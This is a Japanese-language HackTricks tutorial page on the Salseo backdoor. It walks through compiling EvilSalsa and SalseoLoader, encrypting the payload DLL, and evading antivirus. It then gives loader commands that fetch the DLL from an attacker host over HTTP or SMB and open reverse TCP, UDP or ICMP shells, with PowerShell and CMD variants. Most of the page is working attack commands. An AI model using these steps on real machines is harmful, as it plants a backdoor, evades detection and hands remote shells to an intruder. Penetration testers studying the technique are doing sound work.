hacktricks/backdoors/salseo.md

9.1 KiB
Raw Blame History

Salseo

{% hint style="success" %} AWSハッキングの学習と練習HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングの学習と練習HackTricks Training GCP Red Team Expert (GRTE)

HackTricksのサポート
{% endhint %}

バイナリのコンパイル

Githubからソースコードをダウンロードし、EvilSalsaSalseoLoaderをコンパイルします。コードをコンパイルするにはVisual Studioがインストールされている必要があります。

これらのプロジェクトを、使用するWindowsボックスのアーキテクチャ用にコンパイルしますWindowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします

Visual Studio内の左側の"Build"タブの**"Platform Target"**でアーキテクチャを選択できます。

**このオプションが見つからない場合は、**"Project Tab"をクリックしてから"<Project Name> Properties"**をクリックします)

その後、両方のプロジェクトをビルドしますBuild -> Build Solutionログ内に実行可能ファイルのパスが表示されます

バックドアの準備

まず、EvilSalsa.dllをエンコードする必要があります。これを行うには、Pythonスクリプトencrypterassembly.pyを使用するか、プロジェクトEncrypterAssemblyをコンパイルできます:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

ウィンドウズ

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, 今、Salseoのすべてを実行するために必要なものが揃いました: エンコードされたEvilDalsa.dllSalseoLoaderのバイナリ

SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないようにしてください...

バックドアを実行する

TCPリバースシェルを取得するHTTPを介してエンコードされたdllをダウンロードする

リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDPリバースシェルを取得するSMBを介してエンコードされたdllをダウンロードする

リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバーimpacket-smbserverを起動することを忘れないでください。

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMPリバースシェルを取得するエンコードされたdllはすでに被害者の中にある

今回は、リバースシェルを受け取るためにクライアントに特別なツールが必要です。ダウンロード: https://github.com/inquisb/icmpsh

ICMP応答を無効にする:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

クライアントを実行する:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

被害者の内部で、salseoのことを実行しましょう

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする

Visual Studioを使用してSalseoLoaderプロジェクトを開きます。

メイン関数の前に追加: [DllExport]

このプロジェクトにDllExportをインストール

ツール --> NuGet パッケージ マネージャー --> ソリューションの NuGet パッケージを管理...

DllExport パッケージを検索 (Browse タブを使用) し、インストールを押して (ポップアップを受け入れる)

プロジェクトフォルダに DllExport.batDllExport_Configure.bat というファイルが表示されます

DllExportをアンインストール

アンインストール を押します (はい、奇妙ですが、信じてください、必要です)

Visual Studioを終了し、DllExport_configureを実行

単に Visual Studio を 終了 します

その後、SalseoLoaderフォルダに移動し、DllExport_Configure.bat を実行します

x64 を選択します (x64ボックス内で使用する場合、私の場合はそうでした)、System.Runtime.InteropServices (DllExportのNamespace内) を選択し、Apply を押します

プロジェクトを再度Visual Studioで開く

[DllExport] はもはやエラーとしてマークされていません

ソリューションをビルド

Output Type = Class Library を選択します (プロジェクト --> SalseoLoader プロパティ --> アプリケーション --> Output type = Class Library)

x64プラットフォーム を選択します (プロジェクト --> SalseoLoader プロパティ --> ビルド --> Platform target = x64)

ソリューションをビルドするには: Build --> Build Solution (Outputコンソール内に新しいDLLのパスが表示されます)

生成されたDllをテスト

生成されたDllをテストしたい場所にコピーして貼り付けます。

実行:

rundll32.exe SalseoLoader.dll,main

もしエラーが表示されない場合、おそらく機能するDLLを持っています

DLLを使用してシェルを取得する

HTTP サーバーを使用して、nc リスナーを設定することを忘れないでください

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

{% hint style="success" %} AWSハッキングの学習と練習:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングの学習と練習: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksのサポート
{% endhint %}